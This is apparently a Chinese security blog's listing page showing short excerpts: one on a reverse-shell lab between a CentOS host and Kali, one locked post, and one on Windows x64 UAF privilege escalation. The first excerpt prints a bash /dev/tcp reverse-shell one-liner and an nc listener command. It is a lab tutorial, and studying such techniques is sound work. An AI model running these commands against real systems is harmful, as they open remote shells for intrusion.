摘要：CentOS 6.5：192.168.0.3 kali2.0：192.168.0.4 方法1：反弹shell命令如下： bash -i >& /dev/tcp/ip/port 0>&1首先，使用nc在kali上监听端口： nc -lvp 7777 bash -i >& /dev/tcp/192.16 阅读全文

该文被密码保护。

摘要：之前在看雪看了一篇关于UAF的漏洞详解，里面博主写了关于Win7 x86下的UAF提权。但是后来提出很多关于在Win x64下的UAF问题。 问题是关于Token 里 nt!_EX_FAST_REF 结构中在X86的结构下偏移是F8。 但在x64中并没有写到偏移是多少，自己花了点时间解答一下。 首先 阅读全文